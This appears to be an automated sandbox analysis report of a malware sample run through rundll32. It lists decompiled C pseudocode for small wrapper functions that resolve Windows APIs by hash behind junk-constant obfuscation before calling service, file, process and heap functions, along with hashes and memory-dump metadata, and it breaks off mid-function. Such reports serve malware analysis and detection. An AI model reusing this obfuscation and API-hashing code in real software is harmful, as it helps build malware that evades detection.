

                                                                                                                          APIs
                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 002291A8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ManagerOpen
                                                                                                                          • String ID: WF
                                                                                                                          • API String ID: 1889721586-2390014890
                                                                                                                          • Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                          • Instruction ID: 1ec3f580195613909d94614bce3d319d67826ea4c4b035f6fd9e36bbca4b61c0
                                                                                                                          • Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                          • Instruction Fuzzy Hash: E80169B1911108FBEB08CB95DD4ACAFBFB8EB85714F108099F404A7200D3B15F249AA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 255 2242c4-224345 call 2320b9 call 23aa30 OpenServiceW
                                                                                                                          C-Code - Quality: 48%
                                                                                                                          			E002242C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _t24;
                                                                                                                          				void* _t29;
                                                                                                                          				void* _t34;
                                                                                                                          
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(_a20);
                                                                                                                          				_t34 = __edx;
                                                                                                                          				_push(_a16);
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E002320B9(_t24);
                                                                                                                          				_v8 = 0x971c9e;
                                                                                                                          				_v8 = _v8 >> 3;
                                                                                                                          				_v8 = _v8 + 0xbdaa;
                                                                                                                          				_v8 = _v8 | 0x44f2c0c3;
                                                                                                                          				_v8 = _v8 ^ 0x44fb9439;
                                                                                                                          				_v12 = 0x762558;
                                                                                                                          				_v12 = _v12 | 0xdc63e739;
                                                                                                                          				_v12 = _v12 ^ 0xdc7b8d87;
                                                                                                                          				E0023AA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
                                                                                                                          				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
                                                                                                                          				return _t29;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,00234A8F,?,?,2635DC09), ref: 0022433F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: OpenService
                                                                                                                          • String ID: X%v
                                                                                                                          • API String ID: 3098006287-3430654708
                                                                                                                          • Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                          • Instruction ID: c3f856f7d6e1f6bbf38801f601657d25fb05a1798e1b5af9866dd778337b3768
                                                                                                                          • Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                          • Instruction Fuzzy Hash: F30104B281120CFBDF15DFD4D9468DEBF79EB14314F148198F90562221E2729B60AB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 260 228f65-229010 call 2320b9 call 23aa30 CreateFileW
                                                                                                                          C-Code - Quality: 35%
                                                                                                                          			E00228F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _v24;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				void* _t32;
                                                                                                                          				void* _t38;
                                                                                                                          
                                                                                                                          				_push(_a40);
                                                                                                                          				_push(0);
                                                                                                                          				_push(_a32);
                                                                                                                          				_push(_a28);
                                                                                                                          				_push(_a24);
                                                                                                                          				_push(_a20);
                                                                                                                          				_push(0);
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E002320B9(_t32);
                                                                                                                          				_v28 = 0xee6fdc;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_v12 = 0x957ab3;
                                                                                                                          				_v12 = _v12 ^ 0x02d9a910;
                                                                                                                          				_v12 = _v12 + 0xffff8488;
                                                                                                                          				_v12 = _v12 ^ 0x02485b8e;
                                                                                                                          				_v8 = 0xf6b813;
                                                                                                                          				_v8 = _v8 + 0xffff9c70;
                                                                                                                          				_v8 = _v8 + 0xffff858c;
                                                                                                                          				_v8 = _v8 ^ 0x00f72129;
                                                                                                                          				E0023AA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
                                                                                                                          				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
                                                                                                                          				return _t38;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 00229009
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                          • Instruction ID: 7695377490bc0970189aacaa2b5cab960e5a9b0dc91e8fcfa961f3cc4f282a61
                                                                                                                          • Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                          • Instruction Fuzzy Hash: 0B111672900219FBCF219FA9DD098DFBFB6EF58354F118188F90862121D3328A65EB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 265 227f5d-227ff1 call 2320b9 call 23aa30 CreateProcessW
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0022AD99,?,?,?,181C8C04,0022AD99), ref: 00227FEB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 963392458-0
                                                                                                                          • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                          • Instruction ID: 99209d7272f3e1eaf9608c9f95ec42e42f8b3cc0138387abc74ef270b4f65e14
                                                                                                                          • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                          • Instruction Fuzzy Hash: B811D372402128BBDF619F91DD09CEF7F79EF093A4F149144FA1921121D2728A60EBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 270 224ddd-224e73 call 2320b9 call 23aa30 SHFileOperationW
                                                                                                                          C-Code - Quality: 16%
                                                                                                                          			E00224DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				void* _t30;
                                                                                                                          				int _t38;
                                                                                                                          				signed int _t40;
                                                                                                                          				signed int _t44;
                                                                                                                          				struct _SHFILEOPSTRUCTW* _t45;
                                                                                                                          
                                                                                                                          				_push(_a12);
                                                                                                                          				_t45 = __edx;
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				E002320B9(_t30);
                                                                                                                          				_v16 = _v16 & 0x00000000;
                                                                                                                          				_v24 = 0x8324bd;
                                                                                                                          				_v20 = 0xe59c0f;
                                                                                                                          				_v12 = 0xfa6a5a;
                                                                                                                          				_v12 = _v12 | 0x6fcfbea7;
                                                                                                                          				_t40 = 0x1a;
                                                                                                                          				_push(0x3771311d);
                                                                                                                          				_push(_t40);
                                                                                                                          				_v12 = _v12 * 0x42;
                                                                                                                          				_v12 = _v12 ^ 0xdff430a4;
                                                                                                                          				_v8 = 0x460bc4;
                                                                                                                          				_v8 = _v8 | 0x3946640e;
                                                                                                                          				_push(0xdf0d4f1a);
                                                                                                                          				_v8 = _v8 / _t40;
                                                                                                                          				_v8 = _v8 + 0x2a2;
                                                                                                                          				_v8 = _v8 ^ 0x023f16a4;
                                                                                                                          				_t44 = 0x58;
                                                                                                                          				E0023AA30(_t44);
                                                                                                                          				_t38 = SHFileOperationW(_t45); // executed
                                                                                                                          				return _t38;
                                                                                                                          			}














                                                                                                                          APIs
                                                                                                                          • SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 00224E6D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileOperation
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3080627654-0
                                                                                                                          • Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                          • Instruction ID: 12667971c8dd31a0e80beebaf091f0db14574a0e31e91729d9933cd560787f84
                                                                                                                          • Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                          • Instruction Fuzzy Hash: AE0139B6E01209FBCB14EFA4D9469DEBFB4EF40314F10C088E904A6251D3744B54AB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E00225DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                          				unsigned int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _t21;
                                                                                                                          				intOrPtr* _t25;
                                                                                                                          				void* _t26;
                                                                                                                          				void* _t30;
                                                                                                                          				void* _t31;
                                                                                                                          				void* _t33;
                                                                                                                          				intOrPtr _t34;
                                                                                                                          
                                                                                                                          				_t31 = __edx;
                                                                                                                          				_t34 = __ecx;
                                                                                                                          				E002320B9(_t21);
                                                                                                                          				_v12 = 0x9fac18;
                                                                                                                          				_v12 = _v12 ^ 0x90454497;
                                                                                                                          				_v12 = _v12 ^ 0x90d3245f;
                                                                                                                          				_v8 = 0x647eb;
                                                                                                                          				_v8 = _v8 >> 0xd;
                                                                                                                          				_v8 = _v8 >> 3;
                                                                                                                          				_v8 = _v8 + 0xffff0b9f;
                                                                                                                          				_v8 = _v8 ^ 0xfff54d3d;
                                                                                                                          				_t25 = E0023AA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
                                                                                                                          				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
                                                                                                                          				return _t26;
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 00225E58
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileHandleInformation
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3935143524-0
                                                                                                                          • Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                          • Instruction ID: b57f4ff2eebaeff241e8e414d3b033bc2b56782d7408eaa022a4436388064250
                                                                                                                          • Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                          • Instruction Fuzzy Hash: 2D01BCB6901208BBDB24DE90CC0AEEEBF74EF55314F108088F50466250E3B05B249BA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 280 221e22-221ea6 call 2320b9 call 23aa30 RtlAllocateHeap
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E00221E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _t27;
                                                                                                                          				void* _t34;
                                                                                                                          				signed int _t36;
                                                                                                                          				long _t42;
                                                                                                                          
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(_a16);
                                                                                                                          				_t42 = __ecx;
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E002320B9(_t27);
                                                                                                                          				_v12 = 0x309d17;
                                                                                                                          				_v12 = _v12 | 0x1b560655;
                                                                                                                          				_v12 = _v12 ^ 0x1b78328a;
                                                                                                                          				_v8 = 0xa187d;
                                                                                                                          				_v8 = _v8 + 0xa972;
                                                                                                                          				_t36 = 0x67;
                                                                                                                          				_v8 = _v8 / _t36;
                                                                                                                          				_v8 = _v8 << 7;
                                                                                                                          				_v8 = _v8 ^ 0x000b519a;
                                                                                                                          				E0023AA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
                                                                                                                          				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
                                                                                                                          				return _t34;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,002280DB,?,00000000,AF136809), ref: 00221EA0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                          • Instruction ID: 819a1e1d1a8800e51e854a39f40df36a82648236fbd42561c2a96686b514be7b
                                                                                                                          • Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                          • Instruction Fuzzy Hash: BA014876901108FBEB05DFD4DC0A8DE7BB5EB45354F208099F90856211E7B29F24AB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 285 2346bb-23473b call 2320b9 call 23aa30 SHGetFolderPathW
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E002346BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				void* _t21;
                                                                                                                          				intOrPtr* _t25;
                                                                                                                          				void* _t26;
                                                                                                                          
                                                                                                                          				E002320B9(_t21);
                                                                                                                          				_v20 = 0x3f5bb0;
                                                                                                                          				_v16 = 0;
                                                                                                                          				_v12 = 0x996874;
                                                                                                                          				_v12 = _v12 << 0xf;
                                                                                                                          				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                          				_v8 = 0xebf0af;
                                                                                                                          				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                          				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                          				_t25 = E0023AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                          				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                          				return _t26;
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00234735
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FolderPath
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1514166925-0
                                                                                                                          • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                          • Instruction ID: 1f3633c7be4ae9f2ed62f7a2ddf1eb95085440f031275aad379cd8ea9b14d276
                                                                                                                          • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                          • Instruction Fuzzy Hash: 44012C75801218BBCF15AFD5DC098DFBFB8EF45394F108145F91826211D2758A60DBD1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 73%
                                                                                                                          			E002293ED() {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _v24;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				intOrPtr _t24;
                                                                                                                          
                                                                                                                          				_v28 = 0xda6c64;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_v12 = 0x88a564;
                                                                                                                          				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                          				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                          				_v8 = 0xd9241f;
                                                                                                                          				_v8 = _v8 * 0x5c;
                                                                                                                          				_v8 = _v8 + 0xccdd;
                                                                                                                          				_v8 = _v8 + 0x903;
                                                                                                                          				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                          				E0023AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                          				ExitProcess(0);
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0022945B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                          • Instruction ID: e3b3546883e91a0e858999574d5a931867f36b7ce1248280a80e72db07e580a6
                                                                                                                          • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                          • Instruction Fuzzy Hash: C9F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9D604B3261E7705F459A91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00231F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _t19;
                                                                                                                          				int _t25;
                                                                                                                          
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E002320B9(_t19);
                                                                                                                          				_v12 = 0x96b134;
                                                                                                                          				_v12 = _v12 + 0xdeb4;
                                                                                                                          				_v12 = _v12 | 0x0c5d8169;
                                                                                                                          				_v12 = _v12 ^ 0x0cdc4dba;
                                                                                                                          				_v8 = 0xf8ae2a;
                                                                                                                          				_v8 = _v8 + 0xcab3;
                                                                                                                          				_v8 = _v8 * 0x2b;
                                                                                                                          				_v8 = _v8 ^ 0x29e0cf29;
                                                                                                                          				E0023AA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
                                                                                                                          				_t25 = DeleteFileW(_a4); // executed
                                                                                                                          				return _t25;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 00231FF5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4033686569-0
                                                                                                                          • Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                          • Instruction ID: d3d1774543f384e7296eabdbd498e4ce7294bc83eeb0eba8727b7c85dd42c31d
                                                                                                                          • Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                          • Instruction Fuzzy Hash: 45F0F9B191120CFBDF18EFD4D9468AEBFB5EB50304F208199E40467262E7719F589B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 55%
                                                                                                                          			E00238F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                          				unsigned int _v8;
                                                                                                                          				unsigned int _v12;
                                                                                                                          				void* _t19;
                                                                                                                          				int _t24;
                                                                                                                          
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E002320B9(_t19);
                                                                                                                          				_v12 = 0xd87912;
                                                                                                                          				_v12 = _v12 >> 7;
                                                                                                                          				_v12 = _v12 ^ 0x0006adfb;
                                                                                                                          				_v8 = 0xf5ad8e;
                                                                                                                          				_v8 = _v8 + 0xc481;
                                                                                                                          				_v8 = _v8 >> 4;
                                                                                                                          				_v8 = _v8 ^ 0x00032ff7;
                                                                                                                          				E0023AA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
                                                                                                                          				_t24 = CloseServiceHandle(_a12); // executed
                                                                                                                          				return _t24;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • CloseServiceHandle.ADVAPI32(33E0711C), ref: 00239002
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.493650426.0000000000220000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 0000000A.00000002.493673892.0000000000243000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_220000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandleService
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1725840886-0
                                                                                                                          • Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                          • Instruction ID: e514b2255d0258b8f23002517040d092f5f4024eb317050ea0f60a6330cbcd40
                                                                                                                          • Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                          • Instruction Fuzzy Hash: 07F0F9B591120CFFDF05AFD4C94A89EBBB4EB14308F208198F80562611E6769B68EF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 76%
                                                                                                                          			E00235BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                          				signed int _v8;
                                                                                                                          				unsigned int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				intOrPtr _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				void* _t20;
                                                                                                                          				struct HINSTANCE__* _t25;
                                                                                                                          
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E002320B9(_t20);
                                                                                                                          				_v16 = _v16 & 0x00000000;
                                                                                                                          				_v24 = 0x5faaf9;
                                                                                                                          				_v20 = 0xab22cd;
                                                                                                                          				_v12 = 0x8e3542;
                                                                                                                          				_v12 = _v12 >> 7;
                                                                                                                          				_v12 = _v12 ^ 0x00089943;
                                                                                                                          				_v8 = 0x9b967a;
                                                                                                                          				_v8 = _v8 ^ 0x4689732a;
                                                                                                                          				_v8 = _v8 ^ 0x4619bdd7;
